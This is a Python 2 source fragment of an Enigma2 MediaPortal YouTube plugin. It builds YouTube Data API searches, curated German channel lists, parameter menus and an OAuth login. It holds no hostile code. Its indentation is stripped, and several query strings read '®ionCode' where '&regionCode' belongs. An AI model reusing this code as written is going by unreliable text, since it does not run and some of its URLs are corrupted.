config.mediaportal.yt_param_3d_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_duration_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_video_definition_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_event_types_idx = ConfigInteger(default = 0)
config.mediaportal.yt_param_video_type_idx = ConfigInteger(default = 0)
config.mediaportal.yt_refresh_token = ConfigText(default="")
APIKEYV3 = mp_globals.yt_a
param_hl = ('&hl=en-GB', '&hl=de-DE', '&hl=fr-FR', '&hl=it-IT', '')
param_ajax_hl = ('en', 'de', 'fr', 'it', '')
picker_lang = ''
param_ajax_gl = ('us','gb','de','fr','it')
agent = getUserAgent()
std_headers = {
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
default_cover = "file://%s/youtube.png" % (config.mediaportal.iconcachepath.value + "logos")
class youtubeGenreScreen(MenuHelper):
def __init__(self, session):
global yt_oauth2
self.param_qr = ""
self.param_author = ""
self.old_mainidx = -1
self.param_safesearch = ['&safeSearch=none']
self.param_format = '&format=5'
self.subCat = []
self.subCat_L2 = []
self.param_time = [
(_("Date"), "&order=date"),
(_("Rating"), "&order=rating"),
(_("Relevance"), "&order=relevance"),
(_("Title"), "&order=title"),
(_("Video count"), "&order=videoCount"),
(_("View count"), "&order=viewCount")
]
self.param_metalang = [
(_('English'), '&relevanceLanguage=en'),
(_('German'), '&relevanceLanguage=de'),
(_('French'), '&relevanceLanguage=fr'),
(_('Italian'), '&relevanceLanguage=it'),
(_('Any'), '')
]
self.param_regionid = [
(_('Whole world'), '®ionCode=US'),
(_('England'), '®ionCode=GB'),
(_('Germany'), '®ionCode=DE'),
(_('France'), '®ionCode=FR'),
(_('Italy'), '®ionCode=IT')
]
self.param_duration = [
(_('Any'), ''),
('< 4 Min', '&videoDuration=short'),
('4..20 Min', '&videoDuration=medium'),
('> 20 Min', '&videoDuration=long')
]
self.param_3d = [
(_('Any'), ''),
(_('2D'), '&videoDimension=2d'),
(_('3D'), '&videoDimension=3d')
]
self.param_video_definition = [
(_('Any'), ''),
(_('High'), '&videoDefinition=high'),
(_('Low'), '&videoDefinition=standard')
]
self.param_event_types = [
(_('None'), ''),
(_('Completed'), '&eventType=completed'),
(_('Live'), '&eventType=live'),
(_('Upcoming'), '&eventType=upcoming')
]
self.param_video_type = [
(_('Any'), ''),
(_('Episode'), '&videoType=episode'),
(_('Movie'), '&videoType=movie')
]
self.paramList = [
(_('Search request'), (self.paraQuery, None), (0,1,2,)),
(_('Event type'), (self.param_event_types, config.mediaportal.yt_param_event_types_idx), (0,)),
(_('Sort by'), (self.param_time, config.mediaportal.yt_param_time_idx), (0,1,2,)),
(_('Language'), (self.param_metalang, config.mediaportal.yt_param_meta_idx), (0,1,2,3,7,9,10,11,12,13,14)),
(_('Search region'), (self.param_regionid, config.mediaportal.yt_param_regionid_idx), (0,1,2,3,7,9,10,11,12,13,14)),
(_('User name'), (self.paraAuthor, None), (0,1,2,)),
(_('3D Search'), (self.param_3d, config.mediaportal.yt_param_3d_idx), (0,)),
(_('Runtime'), (self.param_duration, config.mediaportal.yt_param_duration_idx), (0,)),
(_('Video definition'), (self.param_video_definition, config.mediaportal.yt_param_video_definition_idx), (0,)),
(_('Video type'), (self.param_video_type, config.mediaportal.yt_param_video_type_idx), (0,))
]
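# Layout note (added for clarity): each paramList entry is a tuple of
# (label, (options-list-or-callback, ConfigInteger index), menu-ids), where
# menu-ids lists the main-menu indices for which the parameter is shown and
# editable - see paramShowHide() and cb_handlekeyYellow() below.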
self.subCatUserChannel = [
(_('Featured'), '/featured?'),
(_('Videos'), '/videos?'),
(_('Playlists'), '/playlists?'),
(_('Channels'), '/channels?')
]
self.subCatUserChannelPlaylist = [
(_('Videos'), '/videos?')
]
self.subCatUserChannelPopularWorldwide = [
(_('Featured'), '/featured?'),
]
self.subCatUserChannelPopular = [
(_('Featured'), '/featured?'),
(_('Videos'), '/videos?'),
(_('Playlists'), '/playlists?')
]
self.subCatYourChannel = [
(_('Playlists'), 'https://www.googleapis.com/youtube/v3/playlists?part=snippet%2Cid&mine=true&access_token=%ACCESSTOKEN%'),
(_('Uploads'), 'https://www.googleapis.com/youtube/v3/channels?part=contentDetails&mine=true&access_token=%ACCESSTOKEN%%playlistId=uploads%'),
(_('Likes'), 'https://www.googleapis.com/youtube/v3/channels?part=contentDetails&mine=true&access_token=%ACCESSTOKEN%%playlistId=likes%'),
(_('Subscriptions'), 'https://www.googleapis.com/youtube/v3/subscriptions?part=snippet&mine=true&access_token=%ACCESSTOKEN%'),
]
self.mainGenres = [
(_('Video search'), 'https://www.googleapis.com/youtube/v3/search?part=snippet&q=%QR%&type=video&key=%KEY%'),
(_('Playlist search'), 'https://www.googleapis.com/youtube/v3/search?part=snippet&q=%QR%&type=playlist&key=%KEY%'),
(_('Channel search'), 'https://www.googleapis.com/youtube/v3/search?part=snippet&q=%QR%&type=channel&key=%KEY%'),
#(_('Categories'), 'https://www.googleapis.com/youtube/v3/guideCategories?part=snippet&key=%KEY%'),
(400 * "—", ''),
(_('My channel'), ''),
(_('Favorites'), ''),
(_('User Channels'), ''),
(400 * "—", ''),
(_('YouTube Channels'), ''),
(_('Selected Channels'), ''),
(_('Music Channels'), ''),
(_('Gaming Channels'), ''),
(_('Car & Vehicle Channels'), ''),
(_('Radio Play Channels'), ''),
]
self.YTChannels = [
(_('Popular on YouTube') + " - " + _('Worldwide'), 'http://www.youtube.com/channel/UCgGzSIa8zIsJHbSs0bLplag'),
(_('Popular on YouTube') + " - " + _('Germany'), 'http://www.youtube.com/channel/UCK274iXLZhs8MFGLsncOyZQ'),
(_('Popular on YouTube') + " - " + _('USA'), 'http://www.youtube.com/channel/UCF0pVplsI8R5kcAqgtoRqoA'),
(_('News'), 'https://www.youtube.com/channel/UCYfdidRxbB8Qhf0Nx7ioOYw'),
(_('Music'), 'https://www.youtube.com/channel/UC-9-kyTW8ZkZNDHQJ6FgpwQ'),
(_('Gaming'), 'https://www.youtube.com/channel/UCOpNcN46UbXVtpKMrmU4Abg'),
(_('Sports'), 'https://www.youtube.com/channel/UCEgdi0XIXXZ-qJOFPf4JSKw'),
(_('Live'), 'https://www.youtube.com/channel/UC4R8DWoMoI7CAwX8_LjQHig'),
(_('Education'), 'https://www.youtube.com/channel/UC3yA8nDwraeOfnYfBWun83g'),
('YouTube Spotlight', 'https://www.youtube.com/channel/UCBR8-60-B28hp2BmDPdntcQ'),
('YouTube Trends', 'https://www.youtube.com/channel/UCeNZlh03MyUkjRlLFpVQxsg'),
('YouTube Creators', 'https://www.youtube.com/channel/UCUZHFZ9jIKrLroW8LcyJEQQ'),
('YouTube Nation', 'https://www.youtube.com/channel/UCUD4yDVyM54QpfqGJX4S7ng'),
('YouTube Rewind', 'https://www.youtube.com/channel/UCnHXLLNHjNAnDQ50JANLG1g')
]
self.HoerspielChannels = [
('Audible Hörbücher', 'https://www.youtube.com/user/audibletrailer'),
('Björns Hörspiel-TV', 'https://www.youtube.com/user/BjoernsHoerspielTV'),
('Edgar Allan Poe´s Kaminzimmer', 'https://www.youtube.com/user/EAPoeProductions'),
('felix auris', 'https://www.youtube.com/user/mercuriius'),
('FRUITY - SOUND - DISASTER', 'https://www.youtube.com/user/MrFruitylooper'),
('Hein Bloed', 'https://www.youtube.com/user/Heinbloedful'),
('Hörbücher, Hörspiele und mehr', 'https://www.youtube.com/user/BestSound1000'),
('Hörspiele und Klassik', 'https://www.youtube.com/user/scyliorhinus'),
('LAUSCH - Phantastische Hörspiele', 'https://www.youtube.com/user/merlausch'),
('Lauschgoldladen', 'https://www.youtube.com/user/Lauschgoldladen'),
('Multipolizei2', 'https://www.youtube.com/user/Multipolizei2'),
('Multipolizei3', 'https://www.youtube.com/user/Multipolizei3'),
('Soundtales Productions', 'https://www.youtube.com/user/SoundtalesProduction'),
]
self.HoerspielChannels.sort(key=lambda t : t[0].lower())
self.subCatHoerspielChannels = []
for item in self.HoerspielChannels:
self.subCatHoerspielChannels.append(self.subCatUserChannel)
self.CarChannels = [
('Alfa Romeo Deutschland', 'https://www.youtube.com/user/AlfaRomeoDE'),
('Audi Deutschland', 'https://www.youtube.com/user/Audi'),
('BMW Deutschland', 'https://www.youtube.com/user/BMWDeutschland'),
('BMW Motorrad', 'https://www.youtube.com/user/bmwmotorrad'),
('CITROËN Deutschland', 'https://www.youtube.com/user/CitroenDeutschland'),
('Ducati Motor Official Channel', 'https://www.youtube.com/user/DucatiMotorHolding'),
('Fiat Deutschland', 'https://www.youtube.com/user/FiatDeutschland'),
('Ford Deutschland', 'https://www.youtube.com/user/fordindeutschland'),
('Harley-Davidson Europe', 'https://www.youtube.com/user/HarleyDavidsonEurope'),
('Honda Deutschland', 'https://www.youtube.com/user/HondaDeutschlandGmbH'),
('Kawasaki Motors Europe', 'https://www.youtube.com/user/Kawasakimotors'),
('Land Rover Deutschland', 'https://www.youtube.com/user/experiencegermany'),
('Mazda Deutschland', 'https://www.youtube.com/user/MazdaDeutschland'),
('Mercedes-Benz', 'https://www.youtube.com/user/mercedesbenz'),
('MITSUBISHI MOTORS Deutschland', 'https://www.youtube.com/user/MitsubishiMotorsDE'),
('Moto Guzzi', 'https://www.youtube.com/user/motoguzziofficial'),
('Nissan Deutschland', 'https://www.youtube.com/user/NissanDeutsch'),
('Porsche Channel', 'https://www.youtube.com/user/Porsche'),
('SEAT Deutschland', 'https://www.youtube.com/user/SEATde'),
('ŠKODA AUTO Deutschland', 'https://www.youtube.com/user/skodade'),
('WAYOFLIFE SUZUKI', 'https://www.youtube.com/user/GlobalSuzukiChannel'),
('Toyota Deutschland', 'https://www.youtube.com/user/toyota'),
('Official Triumph Motorcycles', 'https://www.youtube.com/user/OfficialTriumph'),
('Volkswagen', 'https://www.youtube.com/user/myvolkswagen'),
('Yamaha Motor Europe', 'https://www.youtube.com/user/YamahaMotorEurope'),
('AUTO BILD TV', 'https://www.youtube.com/user/Autobild'),
('autotouring-TV', 'https://www.youtube.com/user/autotouring'),
('ADAC e.V.', 'https://www.youtube.com/user/adac'),
('MOTORVISION BIKE', 'https://www.youtube.com/user/motorvisionbike'),
('www.MOTORRADonline.de', 'https://www.youtube.com/user/motorrad'),
('TOURENFAHRER', 'https://www.youtube.com/user/Tourenfahrer'),
('DEKRA Automobil GmbH', 'https://www.youtube.com/user/DEKRAAutomobil'),
('Motorvision', 'https://www.youtube.com/user/MOTORVISIONcom'),
('Auto Motor & Sport', 'https://www.youtube.com/user/automotorundsport'),
('1000PS Motorradvideos', 'https://www.youtube.com/user/1000ps'),
('Motorrad Online', 'https://www.youtube.com/user/motorrad'),
('DMAX MOTOR', 'https://www.youtube.com/user/DMAX'),
]
self.CarChannels.sort(key=lambda t : t[0].lower())
self.subCatCarChannels = []
for item in self.CarChannels:
self.subCatCarChannels.append(self.subCatUserChannel)
self.GamingChannels = [
('THCsGameChannel', 'https://www.youtube.com/user/THCsGameChannel'),
('Game Tube', 'https://www.youtube.com/user/GameTube'),
('Electronic Arts GmbH', 'https://www.youtube.com/user/ElectronicArtsDE'),
('Ubisoft', 'https://www.youtube.com/user/ubisoft'),
('PlayStation', 'https://www.youtube.com/user/PlayStation'),
('Game Star', 'https://www.youtube.com/user/GameStarDE'),
('Assassins Creed DE', 'https://www.youtube.com/user/AssassinsCreedDE'),
('XboxDE\'s channel', 'https://www.youtube.com/user/XboxDE'),
('Disney Deutschland', 'https://www.youtube.com/user/WaltDisneyStudiosDE'),
('GIGA', 'https://www.youtube.com/user/giga'),
('Gronkh', 'https://www.youtube.com/user/Gronkh'),
('Sarazar', 'https://www.youtube.com/user/SarazarLP'),
('RANDOM ENCOUNTER', 'https://www.youtube.com/user/thegeekmythology'),
('gameinside tv', 'https://www.youtube.com/user/gameinsideshow'),
('Comedy Gaming mit Pink Panter', 'https://www.youtube.com/user/WartimeDignity'),
('CommanderKrieger - Baff Disch', 'https://www.youtube.com/user/CommanderKrieger'),
('Danny Burnage - Darauf ein Snickers-Eis!', 'https://www.youtube.com/user/TheDannyBurnage'),
('m4xFPS - Keks mit ♥', 'https://www.youtube.com/user/m4xFPS'),
('Kanal von xTheSolution', 'https://www.youtube.com/user/xTheSolution'),
('TheDoctorKaboom', 'https://www.youtube.com/user/TheDoctorKaboom'),
]
self.GamingChannels.sort(key=lambda t : t[0].lower())
self.subCatGamingChannels = []
for item in self.GamingChannels:
self.subCatGamingChannels.append(self.subCatUserChannel)
self.MusicChannels = [
('Ultra Music', 'https://www.youtube.com/user/UltraRecords'),
('ArmadaMusic.TV', 'https://www.youtube.com/user/armadamusic'),
('YOU LOVE DANCE.TV', 'https://www.youtube.com/user/Planetpunkmusic'),
('Classical Music Only Channel', 'https://www.youtube.com/user/ClassicalMusicOnly'),
('Music Channel Romania', 'https://www.youtube.com/user/1musicchannel'),
('50 Cent Music', 'https://www.youtube.com/user/50CentMusic'),
('GMC Schlager', 'https://www.youtube.com/user/BlueSilverstar'),
('Classical Music Channel / Klassische', 'https://www.youtube.com/user/BPanther'),
('EMI Music Germany', 'https://www.youtube.com/user/EMIMusicGermany'),
('Sony Music Germany', 'https://www.youtube.com/user/SMECatalogGermany'),
('Kanal von MyWorldCharts', 'https://www.youtube.com/user/MyWorldCharts'),
('CaptainCharts', 'https://www.youtube.com/user/CaptainCharts'),
('PowerCharts', 'https://www.youtube.com/user/PowerCharts'),
('Kontor.TV', 'https://www.youtube.com/user/kontor'),
('Scooter Official', 'https://www.youtube.com/user/scooter'),
('ATZEN MUSIK TV', 'https://www.youtube.com/user/atzenmusiktv'),
('BigCityBeats', 'https://www.youtube.com/user/HammerDontHurtEm'),
('The Best Of', 'https://www.youtube.com/user/alltimebestofmusic'),
('Tomorrowland', 'https://www.youtube.com/user/TomorrowlandChannel'),
('DrDoubleT', 'https://www.youtube.com/user/DrDoubleT'),
('►Techno, HandsUp & Dance◄', 'https://www.youtube.com/user/DJFlyBeatMusic'),
('Zooland Records', 'https://www.youtube.com/user/zoolandMusicGmbH'),
('Bazooka Records', 'https://www.youtube.com/user/bazookalabel'),
('Crystal Lake Music', 'https://www.youtube.com/user/CrystaLakeTV'),
('SKRILLEX', 'https://www.youtube.com/user/TheOfficialSkrillex'),
('AggroTV', 'https://www.youtube.com/user/aggroTV'),
('Bands & ART-Ellie Goulding', 'https://www.youtube.com/user/EllieGouldingEmpire'),
('Bands & ART-Psyche', 'https://www.youtube.com/user/thandewye'),
('Bands & ART-Joint Venture', 'https://www.youtube.com/user/srudlak'),
('Bands & ART-Madonna', 'https://www.youtube.com/user/madonna'),
('BB Sound Production', 'https://www.youtube.com/user/b0ssy007'),
('Chill-out,Lounge,Jazz,Electronic,Psy,Piano,Trance', 'https://www.youtube.com/user/aliasmike2002'),
('Gothic1', 'https://www.youtube.com/user/AiratzuMusic'),
('Gothic2', 'https://www.youtube.com/user/INM0R4L'),
('Gothic-Industrial Mix', 'https://www.youtube.com/user/noetek'),
('Wave & Gothic', 'https://www.youtube.com/user/MrBelorix'),
('Indie', 'https://www.youtube.com/user/curie78'),
('Planetpunkmusic TV', 'https://www.youtube.com/user/Planetpunkmusic'),
('Selfmade Records', 'https://www.youtube.com/user/SelfmadeRecords'),
('UKF-DrumandBass', 'https://www.youtube.com/user/UKFDrumandBass'),
('UKF-Dubstep', 'https://www.youtube.com/user/UKFDubstep'),
('UKF-Music', 'https://www.youtube.com/user/UKFMusic'),
('UKF-Mixes', 'https://www.youtube.com/user/UKFMixes'),
('UKF-Live', 'https://www.youtube.com/user/UKFLive'),
('Smarty Music', 'https://www.youtube.com/user/smartymcfly'),
('MoMMusic Network', 'https://www.youtube.com/user/MrMoMMusic'),
('Schlager Affe', 'https://www.youtube.com/user/schlageraffe2011'),
('Elvis Presley', 'https://www.youtube.com/user/elvis'),
('Dj3P51LON', 'https://www.youtube.com/user/Dj3P51LON'),
('HeadhunterzMedia', 'https://www.youtube.com/user/HeadhunterzMedia'),
('GMC Volkstümlicher Schlager', 'https://www.youtube.com/user/gusbara'),
('GMC HQ Volkstümlicher Schlager', 'https://www.youtube.com/user/GMChq'),
]
self.MusicChannels.sort(key=lambda t : t[0].lower())
self.subCatMusicChannels = []
for item in self.MusicChannels:
self.subCatMusicChannels.append(self.subCatUserChannel)
self.SelectedChannels = [
('VEVO Music', 'https://www.youtube.com/user/VEVO'),
('KinoCheck', 'https://www.youtube.com/user/KinoCheck'),
('Rocket Beans TV', 'https://www.youtube.com/user/ROCKETBEANSTV'),
('Daheimkino', 'https://www.youtube.com/user/Daheimkino'),
('E2WORLD', 'https://www.youtube.com/channel/UC95hFgcA4hzKcOQHiEFX3UA'),
('The HDR Channel', 'https://www.youtube.com/channel/UCve7_yAZHFNipzeAGBI5t9g'),
('4K Relaxation Channel', 'https://www.youtube.com/channel/UCg72Hd6UZAgPBAUZplnmPMQ'),
]
self.SelectedChannels.sort(key=lambda t : t[0].lower())
self.subCatSelectedChannels = []
for item in self.SelectedChannels:
self.subCatSelectedChannels.append(self.subCatUserChannel)
try:
fname = mp_globals.pluginPath + "/userfiles/userchan.xml"
self.user_path = config.mediaportal.watchlistpath.value + "mp_userchan.xml"
from os.path import exists
if not exists(self.user_path):
shutil.copyfile(fname, self.user_path)
return
fp = open(self.user_path)
data = fp.read()
fp.close()
except IOError, e:
self.UserChannels = []
self.UserChannels.append((_('No channels found!'), ''))
else:
list = re.findall('<name>(.*?)</name>.*?<user>(.*?)</user>', data, re.S)
self.UserChannels = []
if list:
for (name, user) in list:
if user.strip().startswith('UC'):
self.UserChannels.append((name.strip(), 'https://www.youtube.com/channel/'+user.strip()))
elif user.strip().startswith('PL'):
self.UserChannels.append((name.strip(), 'gdata.youtube.com/feeds/api/users/'+user.strip()+'/uploads?'))
else:
self.UserChannels.append((name.strip(), 'https://www.youtube.com/user/'+user.strip()))
self.keyLocked = False
else:
self.UserChannels.append((_('No channels found!'), ''))
self.subCatUserChannels = []
for item in self.UserChannels:
if item[1].replace('gdata.youtube.com/feeds/api/users/', '').startswith('PL'):
self.subCatUserChannels.append(self.subCatUserChannelPlaylist)
elif item[1] != "":
self.subCatUserChannels.append(self.subCatUserChannel)
else:
self.subCatUserChannels.append(None)
MenuHelper.__init__(self, session, 2, None, "", "", self._defaultlistcenter, 'MP_YouTube')
self["yt_actions"] = ActionMap(["MP_Actions"], {
"yellow": self.keyYellow,
"blue": self.login
}, -1)
self['title'] = Label("YouTube")
self['ContentTitle'] = Label(_("VIDEOSEARCH"))
self['Query'] = Label(_("Search request"))
self['query'] = Label()
self['Time'] = Label(_("Sort by"))
self['time'] = Label()
self['Metalang'] = Label(_("Language"))
self['metalang'] = Label()
self['Regionid'] = Label(_("Search region"))
self['regionid'] = Label()
self['Author'] = Label(_("User name"))
self['author'] = Label()
self['Keywords'] = Label(_("Event type"))
self['keywords'] = Label()
self['Parameter'] = Label(_("Parameter"))
self['3D'] = Label(_("3D Search"))
self['3d'] = Label()
self['Duration'] = Label(_("Runtime"))
self['duration'] = Label()
self['Reserve1'] = Label(_("Video definition"))
self['reserve1'] = Label()
self['Reserve2'] = Label(_("Video type"))
self['reserve2'] = Label()
self['coverArt'] = Pixmap()
self['F3'] = Label(_("Edit Parameter"))
self['F4'] = Label(_("Request YT-Token"))
self.onLayoutFinish.append(self.initSubCat)
self.mh_On_setGenreStrTitle.append((self.keyYellow, [0]))
self.onClose.append(self.saveIdx)
self.channelId = None
def initSubCat(self):
CoverHelper(self['coverArt']).getCover(default_cover)
hl = param_hl[config.mediaportal.yt_param_meta_idx.value]
rc = self.param_regionid[config.mediaportal.yt_param_regionid_idx.value][1].split('=')[-1]
if not rc:
rc = 'US'
url = 'https://www.googleapis.com/youtube/v3/videoCategories?part=snippet%s®ionCode=%s&key=%s' % (hl, rc, APIKEYV3)
twAgentGetPage(url, agent=agent, headers=std_headers).addCallback(self.parseCats)
def parseCats(self, data):
data = json.loads(data)
for item in data.get('items', {}):
if item['snippet']['assignable']:
self.subCat.append((str(item['snippet']['title'].encode('utf-8')), '&videoCategoryId=%s' % str(item['id'])))
self.subCat_L2.append(None)
self.subCat.sort(key=lambda t : t[0].lower())
self.subCat.insert(0, ((_('No Category'), '')))
self.subCat_L2.insert(0, (None))
self.mh_genreMenu = [
self.mainGenres,
[
self.subCat,
None,
None,
#None,
None,
self.subCatYourChannel,
None,
self.UserChannels,
None,
self.YTChannels,
self.SelectedChannels,
self.MusicChannels,
self.GamingChannels,
self.CarChannels,
self.HoerspielChannels,
],
[
self.subCat_L2,
None,
None,
#None,
None,
[None, None, None, None],
None,
self.subCatUserChannels,
None,
[self.subCatUserChannelPopularWorldwide, self.subCatUserChannelPopular, self.subCatUserChannelPopular, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannelPopular, self.subCatUserChannelPopular, self.subCatUserChannelPopular, self.subCatUserChannelPopular, self.subCatUserChannelPopular],
self.subCatSelectedChannels,
self.subCatMusicChannels,
self.subCatGamingChannels,
self.subCatCarChannels,
self.subCatHoerspielChannels,
]
]
self.mh_loadMenu()
def paraQuery(self):
self.session.openWithCallback(self.cb_paraQuery, VirtualKeyBoardExt, title = (_("Enter search criteria")), text = self.param_qr, is_dialog=True, auto_text_init=True, suggest_func=self.getSuggestions)
def cb_paraQuery(self, callback = None, entry = None):
if callback != None:
self.param_qr = callback.strip()
self.showParams()
def paraAuthor(self):
self.session.openWithCallback(self.cb_paraAuthor, VirtualKeyBoardExt, title = (_("Author")), text = self.param_author, is_dialog=True)
def cb_paraAuthor(self, callback = None, entry = None):
if callback != None:
self.param_author = callback.strip()
self.channelId = None
self.showParams()
def showParams(self):
try:
self['query'].setText(self.param_qr)
self['time'].setText(self.param_time[config.mediaportal.yt_param_time_idx.value][0])
self['reserve1'].setText(self.param_video_definition[config.mediaportal.yt_param_video_definition_idx.value][0])
self['reserve2'].setText(self.param_video_type[config.mediaportal.yt_param_video_type_idx.value][0])
self['metalang'].setText(self.param_metalang[config.mediaportal.yt_param_meta_idx.value][0])
self['regionid'].setText(self.param_regionid[config.mediaportal.yt_param_regionid_idx.value][0])
self['3d'].setText(self.param_3d[config.mediaportal.yt_param_3d_idx.value][0])
self['duration'].setText(self.param_duration[config.mediaportal.yt_param_duration_idx.value][0])
self['author'].setText(self.param_author)
self['keywords'].setText(self.param_event_types[config.mediaportal.yt_param_event_types_idx.value][0])
except:
pass
self.paramShowHide()
def paramShowHide(self):
if self.old_mainidx == self.mh_menuIdx[0]:
return
else:
self.old_mainidx = self.mh_menuIdx[0]
showCtr = 0
self['Parameter'].hide()
if self.mh_menuIdx[0] in self.paramList[0][2]:
self['query'].show()
self['Query'].show()
self['Parameter'].show()
showCtr = 1
else:
self['query'].hide()
self['Query'].hide()
if self.mh_menuIdx[0] in self.paramList[1][2]:
self['keywords'].show()
self['Keywords'].show()
showCtr = 1
else:
self['keywords'].hide()
self['Keywords'].hide()
if self.mh_menuIdx[0] in self.paramList[2][2]:
self['time'].show()
self['Time'].show()
showCtr = 1
else:
self['time'].hide()
self['Time'].hide()
if self.mh_menuIdx[0] in self.paramList[3][2]:
self['metalang'].show()
self['Metalang'].show()
self['Parameter'].show()
showCtr = 1
else:
self['metalang'].hide()
self['Metalang'].hide()
if self.mh_menuIdx[0] in self.paramList[4][2]:
self['regionid'].show()
self['Regionid'].show()
showCtr = 1
else:
self['regionid'].hide()
self['Regionid'].hide()
if self.mh_menuIdx[0] in self.paramList[5][2]:
self['author'].show()
self['Author'].show()
showCtr = 1
else:
self['author'].hide()
self['Author'].hide()
if self.mh_menuIdx[0] in self.paramList[6][2]:
self['3d'].show()
self['3D'].show()
showCtr = 1
else:
self['3d'].hide()
self['3D'].hide()
if self.mh_menuIdx[0] in self.paramList[7][2]:
self['duration'].show()
self['Duration'].show()
showCtr = 1
else:
self['duration'].hide()
self['Duration'].hide()
if self.mh_menuIdx[0] in self.paramList[8][2]:
self['reserve1'].show()
self['Reserve1'].show()
showCtr = 1
else:
self['reserve1'].hide()
self['Reserve1'].hide()
if self.mh_menuIdx[0] in self.paramList[9][2]:
self['reserve2'].show()
self['Reserve2'].show()
showCtr = 1
else:
self['reserve2'].hide()
self['Reserve2'].hide()
if showCtr:
self['F3'].show()
else:
self['F3'].hide()
def mh_loadMenu(self):
self.showParams()
self.mh_setMenu(0, True)
self.mh_keyLocked = False
def keyYellow(self, edit=1):
c = len(self.paramList)
list = []
if config.mediaportal.yt_paramListIdx.value not in range(0, c):
config.mediaportal.yt_paramListIdx.value = 0
old_idx = config.mediaportal.yt_paramListIdx.value
for i in range(c):
if self.mh_menuIdx[0] in self.paramList[i][2]:
list.append((self.paramList[i][0], i))
if list and edit:
self.session.openWithCallback(self.cb_handlekeyYellow, ChoiceBoxExt, title=_("Edit Parameter"), list = list, selection=old_idx)
else:
self.showParams()
def cb_handlekeyYellow(self, answer):
pidx = answer and answer[1]
if pidx != None:
config.mediaportal.yt_paramListIdx.value = pidx
if type(self.paramList[pidx][1][0]) == list:
self.changeListParam(self.paramList[pidx][0], *self.paramList[pidx][1])
else:
self.paramList[pidx][1][0]()
self.showParams()
def changeListParam(self, nm, l, idx):
if idx.value not in range(0, len(l)):
idx.value = 0
list = []
for i in range(len(l)):
list.append((l[i][0], (i, idx)))
if list:
self.session.openWithCallback(self.cb_handleListParam, ChoiceBoxExt, title=_("Edit Parameter") + " '%s'" % nm, list = list, selection=idx.value)
def cb_handleListParam(self, answer):
p = answer and answer[1]
if p != None:
p[1].value = p[0]
self.showParams()
def getUserChannelId(self, usernm, callback):
url = 'https://www.googleapis.com/youtube/v3/channels?part=id&forUsername=%s&key=%s' % (usernm, APIKEYV3)
twAgentGetPage(url, agent=agent, headers=std_headers).addCallback(self.parseChannelId).addCallback(lambda x: callback()).addErrback(self.parseChannelId, True)
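# Illustrative response shape (assumption, minimal form accepted by
# parseChannelId() below):
#   {"items": [{"id": "UCxxxxxxxxxxxxxxxxxxxxxx"}]}
# only items[0]['id'] is evaluated, everything else is ignored.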
def parseChannelId(self, data, err=False):
try:
data = json.loads(data)
self.channelId = str(data['items'][0]['id'])
except:
printl('No CID found.',self,'E')
self.channelId = 'none'
def openListScreen(self):
tm = self.param_time[config.mediaportal.yt_param_time_idx.value][1]
lr = self.param_metalang[config.mediaportal.yt_param_meta_idx.value][1]
regionid = self.param_regionid[config.mediaportal.yt_param_regionid_idx.value][1]
_3d = self.param_3d[config.mediaportal.yt_param_3d_idx.value][1]
dura = self.param_duration[config.mediaportal.yt_param_duration_idx.value][1]
vid_def = self.param_video_definition[config.mediaportal.yt_param_video_definition_idx.value][1]
event_type = self.param_event_types[config.mediaportal.yt_param_event_types_idx.value][1]
genreurl = self.mh_genreUrl[0] + self.mh_genreUrl[1]
if 'googleapis.com' in genreurl:
if '/guideCategories' in genreurl or '/playlists' in genreurl:
lr = param_hl[config.mediaportal.yt_param_meta_idx.value]
if not '%ACCESSTOKEN%' in genreurl:
if self.param_author:
if not self.channelId:
return self.getUserChannelId(self.param_author, self.openListScreen)
else:
channel_id = '&channelId=%s' % self.channelId
else: channel_id = ''
genreurl = genreurl.replace('%QR%', urllib.quote_plus(self.param_qr))
genreurl += regionid + lr + tm + channel_id + self.param_safesearch[0]
if 'type=video' in genreurl:
vid_type = self.param_video_type[config.mediaportal.yt_param_video_type_idx.value][1]
genreurl += _3d + dura + vid_def + event_type + vid_type
elif _('Favorites') in self.mh_genreTitle:
genreurl = ''
else:
genreurl = self.mh_genreUrl[0] + self.mh_genreUrl[1] + self.mh_genreUrl[2]
if self.mh_genreTitle != (400 * "—"):
self.session.open(YT_ListScreen, genreurl, self.mh_genreTitle)
def mh_callGenreListScreen(self):
global picker_lang
picker_lang = ''
if _('My channel') in self.mh_genreTitle:
if not config.mediaportal.yt_refresh_token.value:
self.session.open(MessageBoxExt, _("You need to request a token to allow access to your YouTube account."), MessageBoxExt.TYPE_INFO)
return
self.openListScreen()
def login(self):
if not config.mediaportal.yt_refresh_token.value:
yt_oauth2.requestDevCode(self.session)
else:
self.session.openWithCallback(self.cb_login, MessageBoxExt, _("Did you revoke the access?"), type=MessageBoxExt.TYPE_YESNO, default=False)
def cb_login(self, answer):
if answer is True:
yt_oauth2.requestDevCode(self.session)
def saveIdx(self):
config.mediaportal.yt_param_meta_idx.save()
yt_oauth2._tokenExpired()
def getSuggestions(self, text, max_res):
hl = param_ajax_hl[config.mediaportal.yt_param_meta_idx.value]
gl = param_ajax_gl[config.mediaportal.yt_param_regionid_idx.value]
url = "https://clients1.google.com/complete/search?client=youtube&hl=%s&gl=%s&ds=yt&q=%s" % (hl, gl, urllib.quote_plus(text))
d = twAgentGetPage(url, agent=agent, headers=std_headers, timeout=5)
d.addCallback(self.gotSuggestions, max_res)
d.addErrback(self.gotSuggestions, max_res, True)
return d
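# Illustrative payload (assumption): the suggest endpoint answers with
# something like
#   window.google.ac.h(["free",[["freecad",0],["freecad tutorial",0],...]])
# gotSuggestions() below only searches for ',[["' and extracts every
# '"<text>",0' match, so the exact wrapper does not matter.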
def gotSuggestions(self, suggestions, max_res, err=False):
list = []
if not err and suggestions:
i=suggestions.find(',[["')
if i > 0:
for m in re.finditer('"(.+?)",0', suggestions[i:]):
list.append(decodeHtml(m.group(1)))
max_res -= 1
if not max_res: break
elif err:
printl(str(suggestions),self,'E')
return list
class YT_ListScreen(MPScreen, ThumbsHelper):
param_regionid = (
('&gl=US'),
('&gl=GB'),
('&gl=DE'),
('&gl=FR'),
('&gl=IT')
)
def __init__(self, session, stvLink, stvGenre, title="YouTube"):
self.stvLink = stvLink
self.genreName = stvGenre
self.headers = std_headers
